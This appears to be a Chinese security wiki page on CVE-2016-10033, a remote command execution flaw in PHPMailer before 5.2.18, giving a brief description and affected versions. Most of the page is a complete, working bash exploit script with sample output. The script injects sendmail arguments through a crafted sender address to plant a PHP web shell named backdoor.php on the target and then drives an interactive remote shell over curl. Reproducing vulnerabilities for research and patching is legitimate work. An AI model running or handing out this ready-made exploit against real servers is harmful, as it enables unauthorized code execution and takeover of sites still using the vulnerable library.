menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right (CVE-2016-10033)PHPMailer 5.2.18 远程命令执行漏洞 chevron_right (CVE-2016-10033)PHPMailer 5.2.18 远程命令执行漏洞.md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    (CVE-2016-10033)PHPMailer 5.2.18 远程命令执行漏洞.md
    3.15 KB / 2021-07-15 20:00:53
        (CVE-2016-10033)PHPMailer \< 5.2.18 远程命令执行漏洞
======================================================

一、漏洞简介
------------

PHPMailer
5.2.18之前的版本存在一个漏洞,该漏洞可能导致远程代码执行(RCE)。如果未设置Sender属性,则PHPMailer的isMail传输中的mailSend函数可能会允许远程攻击者将额外的参数传递给mail命令,从而通过在预制的发件人地址中使用"(反斜杠双引号)执行任意代码。

二、漏洞影响
------------

PHPMailer \< 5.2.18

三、复现过程
------------

### poc

    root@kali:~/CVE-2016-10033# ./exploit.sh www.0-sec.org:8080
    [+] CVE-2016-10033 exploit by opsxcq
    [+] Exploiting www.0-sec.org:8080
    [+] Target exploited, acessing shell at http://www.0-sec.org:8080/backdoor.php
    [+] Checking if the backdoor was created on target system
    [+] Backdoor.php found on remote system
    [+] Running whoami
    www-data
    RemoteShell> ls
    [+] Running ls
    vulnerable
    RemoteShell> pwd
    [+] Running pwd
    /www
    CVE-2016-10033.sh
    #!/bin/bash
    # CVE-2016-10033 exploit by opsxcq
    # https://github.com/opsxcq/exploit-CVE-2016-10033

    echo '[+] CVE-2016-10033 exploit by opsxcq'

    if [ -z "$1" ]
    then
        echo '[-] Please inform an host as parameter'
        exit -1
    fi

    if [ $(uname) == 'Darwin' ]
    then
        decoder='base64 -D'
    elif [ $(uname) == 'Linux' ]
    then
        decoder='base64 -d'  
    else
        echo '[-] Your platform isnt supported: '$(uname)
        exit -1
    fi


    host=$1

    echo '[+] Exploiting '$host

    curl -sq 'http://'$host -H 'Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzXJpHSq4mNy35tHe' --data-binary $'------WebKitFormBoundaryzXJpHSq4mNy35tHe\r\nContent-Disposition: form-data; name="action"\r\n\r\nsubmit\r\n------WebKitFormBoundaryzXJpHSq4mNy35tHe\r\nContent-Disposition: form-data; name="name"\r\n\r\n<?php echo "|".base64_encode(system(base64_decode($_GET["cmd"])))."|"; ?>\r\n------WebKitFormBoundaryzXJpHSq4mNy35tHe\r\nContent-Disposition: form-data; name="email"\r\n\r\n\"vulnerables\\\" -OQueueDirectory=/tmp -X/www/backdoor.php server\" @test.com\r\n------WebKitFormBoundaryzXJpHSq4mNy35tHe\r\nContent-Disposition: form-data; name="message"\r\n\r\nPwned\r\n------WebKitFormBoundaryzXJpHSq4mNy35tHe--\r\n' >/dev/null && echo '[+] Target exploited, acessing shell at http://'$host'/backdoor.php'


    echo '[+] Checking if the backdoor was created on target system'
    code=$(curl -o /dev/null --silent --head --write-out '%{http_code}\n' "http://$host/backdoor.php")

    if [ "$code" != "200" ]
    then
        echo '[-] Target cant be exploited'
        exit -1
    else
        echo '[+] Backdoor.php found on remote system'
    fi

    cmd='whoami'
    while [ "$cmd" != 'exit' ]
    do
        echo '[+] Running '$cmd
        if ! curl -sq http://$host/backdoor.php?cmd=$(echo -ne $cmd | base64) | grep '|' | grep -v 'base64_encode' | head -n 1 | cut -d '|' -f 2 | $decoder 
        then
            echo '[-] Connection problens'
            exit -1
        fi
        echo
        read -p 'RemoteShell> ' cmd
    done
    echo '[+] Exiting'
    links
    file_download